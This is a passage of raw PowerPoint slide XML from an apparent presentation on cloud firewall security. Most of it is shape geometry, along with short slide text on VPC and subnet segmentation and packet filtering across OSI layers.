                    <a:pt x="1274294" y="2736855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321977" y="2739323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370076" y="2740152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1418174" y="2739323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465857" y="2736855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513096" y="2732776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559864" y="2727112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606135" y="2719891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651880" y="2711139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1697074" y="2700885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741688" y="2689154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785696" y="2675975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829070" y="2661374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1871783" y="2645379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913809" y="2628016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1955119" y="2609313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995687" y="2589298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035485" y="2567996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2074487" y="2545436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112665" y="2521645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149991" y="2496650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186440" y="2470477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221983" y="2443155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2256594" y="2414710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290245" y="2385169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2322910" y="2354560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2354560" y="2322910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385169" y="2290245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2414710" y="2256594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2443155" y="2221983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470477" y="2186440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496650" y="2149991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521645" y="2112665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545436" y="2074487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567996" y="2035485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589298" y="1995687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609313" y="1955119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2628016" y="1913809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2645379" y="1871783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661374" y="1829070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675975" y="1785696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689154" y="1741688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2700885" y="1697074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711139" y="1651880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719891" y="1606135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2727112" y="1559864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732776" y="1513096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736855" y="1465857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739323" y="1418174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2740152" y="1370076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2739323" y="1321977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736855" y="1274294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2732776" y="1227055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2727112" y="1180287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2719891" y="1134016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711139" y="1088271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2700885" y="1043077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2689154" y="998463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2675975" y="954455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2661374" y="911081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2645379" y="868368"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2628016" y="826342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2609313" y="785032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589298" y="744464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2567996" y="704666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2545436" y="665664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2521645" y="627486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496650" y="590160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470477" y="553711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2443155" y="518168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2414710" y="483557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2385169" y="449906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2354560" y="417241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2322910" y="385591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2290245" y="354982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2256594" y="325441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2221983" y="296996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2186440" y="269674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149991" y="243501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2112665" y="218506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2074487" y="194715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2035485" y="172155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1995687" y="150853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1955119" y="130838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1913809" y="112135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1871783" y="94772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1829070" y="78777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1785696" y="64176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1741688" y="50997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1697074" y="39266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1651880" y="29012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606135" y="20260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1559864" y="13039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513096" y="7375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465857" y="3296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1418174" y="828"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1370076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1960" y="5109971"/>
              <a:ext cx="1702308" cy="1700783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700020" y="1780793"/>
            <a:ext cx="11258550" cy="1518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188970" marR="5080" indent="-3176270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pP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Firewalls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work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with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multiple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accounts,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VPCs,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subnets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within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VPCs,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instances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within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subnets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enforce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segmentation.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</a:pPr>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="230504">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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need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segmentation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may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arise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due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following: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7871" y="306451"/>
            <a:ext cx="408051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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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91328" y="760476"/>
            <a:ext cx="5687568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27682" y="1780793"/>
            <a:ext cx="12604115" cy="69723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3943350" marR="5080" indent="-3931285">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pP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Filtering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decisions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made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based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packet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headers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payload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contents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at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various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layers,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identif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rm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OSI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m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del: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440265" y="3935031"/>
            <a:ext cx="3840479" cy="2655570"/>
            <a:chOff x="6440265" y="3935031"/>
            <a:chExt cx="3840479" cy="2655570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6445027" y="3939794"/>
              <a:ext cx="3136900" cy="2646045"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3136900" h="2646045">
                  <a:moveTo>
                    <a:pt x="2822288" y="22351"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2849995" y="62133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2876396" y="102489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2901497" y="143389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2925300" y="184807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2947809" y="226713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2969029" y="269079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2988964" y="311876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3007616" y="355077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3024991" y="398653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3041091" y="442575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3055922" y="486815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3069486" y="531345"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3081787" y="576136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092830" y="621160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102618" y="666388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3111155" y="711792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118445" y="757344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124492" y="803015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3129300" y="848777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132872" y="894602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3135213" y="940460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3136326" y="986324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3136215" y="1032165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134884" y="1077956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3132337" y="1123666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3128578" y="1169269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3123611" y="1214735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3117439" y="1260036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3110066" y="1305145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3101496" y="1350031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3091734" y="1394668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3080783" y="1439027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3068646" y="1483078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3055328" y="1526794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3040833" y="1570147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3025164" y="1613108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3008325" y="1655649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2990321" y="1697740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2971154" y="1739355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2950830" y="1780464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2929351" y="1821038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2906721" y="1861051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882946" y="1900473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2858027" y="1939275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2831970" y="1977430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2804778" y="2014909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2776455" y="2051684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2747004" y="2087726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2716430" y="2123006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2684737" y="2157497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2651928" y="2191170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2618008" y="2223997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2582979" y="2255949"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2546847" y="2286997"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2509614" y="2317114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2470840" y="2346603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2431496" y="2374676"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2391612" y="2401338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2351218" y="2426593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2310340" y="2450446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2269009" y="2472900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2227253" y="2493961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2185100" y="2513631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2142580" y="2531916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2099720" y="2548820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2056550" y="2564347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2013099" y="2578502"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1969395" y="2591288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925466" y="2602710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1881342" y="2612773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1837052" y="2621480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1792623" y="2628836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1748085" y="2634845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1703466" y="2639512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1658795" y="2642840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1614101" y="2644834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569413" y="2645499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524758" y="2644838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480167" y="2642856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435667" y="2639557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1391287" y="2634946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1347056" y="2629026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1303003" y="2621803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1259157" y="2613280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1215545" y="2603461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1172198" y="2592351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1129143" y="2579955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1086409" y="2566276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044025" y="2551319"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1002019" y="2535087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="960421" y="2517586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="919259" y="2498820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="878562" y="2478793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="838359" y="2457508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="798677" y="2434972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="759546" y="2411187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720995" y="2386158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683052" y="2359889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645747" y="2332385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609106" y="2303650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573161" y="2273688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537938" y="2242504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503467" y="2210101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469777" y="2176485"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436896" y="2141659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="404853" y="2105627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373677" y="2068395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343395" y="2029965"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="314038" y="1990343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286365" y="1950596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259969" y="1910214"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234850" y="1869229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211009" y="1827670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188445" y="1785567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167157" y="1742951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147146" y="1699850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128411" y="1656296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110952" y="1612318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94769" y="1567947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79862" y="1523211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66230" y="1478142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53872" y="1432769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42790" y="1387123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32983" y="1341232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24450" y="1295128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17190" y="1248840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11205" y="1202399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6494" y="1155834"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3056" y="1109175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="891" y="1062452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1015695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="968935"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034" y="922201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4960" y="875524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9158" y="828933"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14627" y="782458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21369" y="736129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29381" y="689977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38665" y="644031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49219" y="598321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61045" y="552877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74140" y="507730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88506" y="462910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104142" y="418445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121047" y="374367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139222" y="330705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158666" y="287490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179379" y="244751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201361" y="202518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224612" y="160822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249131" y="119692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274917" y="79158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301972" y="39250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330294" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9524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824721" y="4475226"/>
              <a:ext cx="1443355" cy="981710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1443354" h="981710">
                  <a:moveTo>
                    <a:pt x="1286891" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="156336" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106915" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63998" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30158" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7968" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7968" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30158" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63998" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106915" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156336" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1286891" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336312" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379229" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413069" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435259" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443227" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443227" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435259" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413069" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379229" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336312" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1286891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824721" y="4475226"/>
              <a:ext cx="1443355" cy="981710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1443354" h="981710">
                  <a:moveTo>
                    <a:pt x="0" y="163575"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7968" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30158" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63998" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106915" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156336" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1286891" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336312" y="8343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379229" y="31573"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413069" y="66988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435259" y="111890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443227" y="163575"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1443227" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1435259" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1413069" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379229" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336312" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1286891" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156336" y="981456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106915" y="973112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63998" y="949882"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30158" y="914467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7968" y="869565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="817879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="163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9373869" y="4755642"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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260590" y="6084061"/>
            <a:ext cx="1470660" cy="1005840"/>
            <a:chOff x="7260590" y="6084061"/>
            <a:chExt cx="1470660" cy="1005840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7273290" y="6096761"/>
